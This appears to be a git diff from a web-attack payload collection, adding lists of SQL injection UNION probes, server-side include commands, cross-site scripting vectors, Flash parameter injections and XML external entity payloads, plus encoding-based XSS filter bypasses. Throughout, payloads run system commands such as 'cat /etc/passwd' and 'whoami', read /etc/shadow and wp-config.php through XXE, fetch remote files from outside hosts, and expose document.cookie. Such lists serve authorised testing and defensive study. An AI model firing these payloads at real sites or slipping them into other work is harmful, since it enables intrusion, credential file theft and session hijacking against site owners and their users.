UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
|
|
@ -0,0 +1,18 @@
|
||||||
|
</nowiki>
|
||||||
|
<!--#echo var="DOCUMENT_NAME" -->
|
||||||
|
<!--#echo var="DOCUMENT_URI" -->
|
||||||
|
<!--#config timefmt="A %B %d %Y %r"-->
|
||||||
|
<!--#echo var="DATE_LOCAL" -->
|
||||||
|
<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||||
|
<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
|
||||||
|
<!--#include virtual="/" -->
|
||||||
|
<!--#exec cmd="ls" -->
|
||||||
|
<!--#exec cmd="whoami" -->
|
||||||
|
<!--#exec cmd="uname" -->
|
||||||
|
<!--#exec cmd="dir" -->
|
||||||
|
<!--#exec cmd="cat /etc/passwd" -->
|
||||||
|
<!--#exec cmd="ipconfig" -->
|
||||||
|
<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||||
|
<!--#exec cmd="perl -e 'print "X"*5000'" -->
|
||||||
|
<!--#exec cmd="sleep 5" -->
|
||||||
|
<!--#exec cmd="sleep 10" -->
|
|
@ -0,0 +1,39 @@
|
||||||
|
javascript:alert(1)//INJECTX
|
||||||
|
<svg/onload=alert(1)>//INJECTX
|
||||||
|
<img onload=alert(1)>//INJECTX
|
||||||
|
<img src=x onerror=prompt(1)>//INJECTX
|
||||||
|
<a href="javascript:alert(1)" onmouseover=alert(1)>INJECTX HOVER</a>
|
||||||
|
onmouseover="document.cookie=true;">//INJECTX
|
||||||
|
alert(1)>//INJECTX
|
||||||
|
<h1>INJECTX</h1>
|
||||||
|
<img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
|
||||||
|
<svg><script>/<@/>alert(1)</script>//INJECTX
|
||||||
|
<svg/onload=alert(/INJECTX/)>
|
||||||
|
<iframe/onload=alert(/INJECTX/)>
|
||||||
|
<svg/onload=alert`INJECTX`>
|
||||||
|
<svg/onload=alert(/INJECTX/)>
|
||||||
|
<svg/onload=alert(`INJECTX`)>
|
||||||
|
}alert(/INJECTX/);{//
|
||||||
|
<h1/onclick=alert(1)>a//INJECTX
|
||||||
|
<svg/onload=alert(/INJECTX/)>
|
||||||
|
<p/onclick=alert(/INJECTX/)>a
|
||||||
|
<svg/onload=alert`INJECTX`>
|
||||||
|
<svg/onload=alert(/INJECTX/)>
|
||||||
|
<svg/onload=alert(`INJECTX`)>
|
||||||
|
<video><source onerror="javascript:alert(1)">//INJECTX
|
||||||
|
<video onerror="javascript:alert(1)"><source>//INJECTX
|
||||||
|
<audio onerror="javascript:alert(1)"><source>//INJECTX
|
||||||
|
<input autofocus onfocus=alert(1)>//INJECTX
|
||||||
|
<select autofocus onfocus=alert(1)>//INJECTX
|
||||||
|
<textarea autofocus onfocus=alert(1)>//INJECTX
|
||||||
|
<keygen autofocus onfocus=alert(1)>//INJECTX
|
||||||
|
<button form=test onformchange=alert(1)>//INJECTX
|
||||||
|
<form><button formaction="javascript:alert(1)">//INJECTX
|
||||||
|
<svg onload=(alert)(1) >//INJECTX
|
||||||
|
<script>$=1,alert($)</script>//INJECTX
|
||||||
|
<!--<img src="--><img src=x onerror=alert(1)//">//INJECTX
|
||||||
|
<img/src='x'onerror=alert(1)>//INJECTX
|
||||||
|
<marguee/onstart=alert(1)>//INJECTX
|
||||||
|
<script>alert(1)//INJECTX
|
||||||
|
<script>alert(1)<!--INJECTX
|
||||||
|
<marquee loop=1 width=0 onfinish=alert(1)>//INJECTX
|
|
@ -0,0 +1,24 @@
|
||||||
|
#getURL,javascript:alert(1)",
|
||||||
|
#goto,javascript:alert(1)",
|
||||||
|
?javascript:alert(1)",
|
||||||
|
?alert(1)",
|
||||||
|
?getURL(javascript:alert(1))",
|
||||||
|
?asfunction:getURL,javascript:alert(1)//",
|
||||||
|
?getURL,javascript:alert(1)",
|
||||||
|
?goto,javascript:alert(1)",
|
||||||
|
?clickTAG=javascript:alert(1)",
|
||||||
|
?url=javascript:alert(1)",
|
||||||
|
?clickTAG=javascript:alert(1)&TargetAS=",
|
||||||
|
?TargetAS=javascript:alert(1)",
|
||||||
|
?skinName=asfunction:getURL,javascript:alert(1)//",
|
||||||
|
?baseurl=asfunction:getURL,javascript:alert(1)//",
|
||||||
|
?base=javascript:alert(0)",
|
||||||
|
?onend=javascript:alert(1)//",
|
||||||
|
?userDefined=');function someFunction(a){}alert(1)//",
|
||||||
|
?URI=javascript:alert(1)",
|
||||||
|
?callback=javascript:alert(1)",
|
||||||
|
?getURLValue=javascript:alert(1)",
|
||||||
|
?goto=javascript:alert(1)",
|
||||||
|
?pg=javascript:alert(1)",
|
||||||
|
?page=javascript:alert(1)"
|
||||||
|
?playerready=alert(document.cookie)
|
|
@ -537,7 +537,7 @@ E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert
|
||||||
%EF%BC%9C becomes <
|
%EF%BC%9C becomes <
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass using unicode converted to uppercase
|
Bypass using Unicode converted to uppercase
|
||||||
```
|
```
|
||||||
İ (%c4%b0).toLowerCase() => i
|
İ (%c4%b0).toLowerCase() => i
|
||||||
ı (%c4%b1).toUpperCase() => I
|
ı (%c4%b1).toUpperCase() => I
|
||||||
|
@ -563,6 +563,32 @@ Bypass using UTF-7
|
||||||
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
|
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass using UTF-16be
|
||||||
|
```
|
||||||
|
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
|
||||||
|
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using UTF-32
|
||||||
|
```
|
||||||
|
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.)
|
||||||
|
BOM character allows you to override charset of the page
|
||||||
|
```
|
||||||
|
BOM Character for UTF-16 Encoding:
|
||||||
|
Big Endian : 0xFE 0xFF
|
||||||
|
Little Endian : 0xFF 0xFE
|
||||||
|
XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
|
||||||
|
|
||||||
|
BOM Character for UTF-32 Encoding:
|
||||||
|
Big Endian : 0x00 0x00 0xFE 0xFF
|
||||||
|
Little Endian : 0xFF 0xFE 0x00 0x00
|
||||||
|
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
Bypass using weird encoding or native interpretation to hide the payload (alert())
|
Bypass using weird encoding or native interpretation to hide the payload (alert())
|
||||||
```javascript
|
```javascript
|
||||||
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
|
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
|
||||||
|
@ -600,3 +626,4 @@ Exotic payloads
|
||||||
* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
|
* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
|
||||||
* http://d3adend.org/xss/ghettoBypass
|
* http://d3adend.org/xss/ghettoBypass
|
||||||
* http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
|
* http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
|
||||||
|
* http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
|
||||||
|
|
|
@ -0,0 +1,68 @@
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
|
||||||
|
<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]>
|
||||||
|
<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]>
|
||||||
|
<!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://crowdshield.com/.testing/rfi_vuln.txt"> ]>
|
||||||
|
<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>
|
||||||
|
<?xml version="1.0"?><change-log><text>Hello World</text></change-log>
|
||||||
|
<?xml version="1.0"?><change-log><text>"Hello World"</text></change-log>
|
||||||
|
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>
|
||||||
|
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote """> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>
|
||||||
|
<!ENTITY systemEntity SYSTEM "robots.txt">
|
||||||
|
<change-log> <text>&systemEntity;</text> </change-log>
|
||||||
|
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log>
|
||||||
|
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log>
|
||||||
|
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log>
|
||||||
|
<test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]> </test>
|
||||||
|
<?xml version="1.0"?><change-log><text><script>alert(1)</script></text></change-log>
|
||||||
|
count(/child::node())
|
||||||
|
x' or name()='username' or 'x'='y
|
||||||
|
<name>','')); phpinfo(); exit;/*</name>
|
||||||
|
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||||
|
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://xerosecurity.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo>
|
||||||
|
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>"
|
||||||
|
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||||
|
<xml SRC="https://crowdshield.com/.testing/rfi_vuln.txt" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||||
|
<HTML xmlns:xss><?import namespace="xss" implementation="https://crowdshield.com/.testing/xss.html"><xss:xss>XSS</xss:xss></HTML>
|
||||||
|
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||||
|
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<xml SRC="https://crowdshield.com/.testing/xss.html" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">%f5a30; ]>
|
||||||
|
‘
|
||||||
|
“
|
||||||
|
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../boot.ini" ]> <change-log> <text>&systemEntity;</text>; </change-log>
|
||||||
|
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/boot.ini" >]><doc><test>Contents of file: &xxe;</test></doc>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi.txt" >]><foo>&xxe;</foo>
|
||||||
|
"}}</script><script>alert(1);</script></body></html><!--
|
||||||
|
}}</script>'"
|
||||||
|
}}</script>'
|
||||||
|
'}}</script>'
|
||||||
|
'}}</script>"
|
||||||
|
<?xml version="1.0" encoding="utf-16" standalone="yes"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://wordpress.org/</string></value></param><param><value><string>http://xerosecurity.com</string></value></param></params></methodCall>
|
||||||
|
<xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "../../../../../../../etc/passwd">]><methodCall><methodName>&xxe</methodName></methodCall>
|
||||||
|
<xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "http://xerosecurity.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall>
|
||||||
|
<xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
||||||
|
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
||||||
|
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/htdocs/wordpress/wp-config.php" >]><doc><test>Contents of file: &xxe;</test></doc>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt">]><foo>&xxe;</foo>
|
||||||
|
}}</script><script>alert(1);</script></body></html><!--
|
||||||
|
"}}</script>'
|
||||||
|
}}</script>""'"
|
||||||
|
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
|
||||||
|
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg>
|
||||||
|
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||||
|
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
|
||||||
|
|
Loading…
Reference in New Issue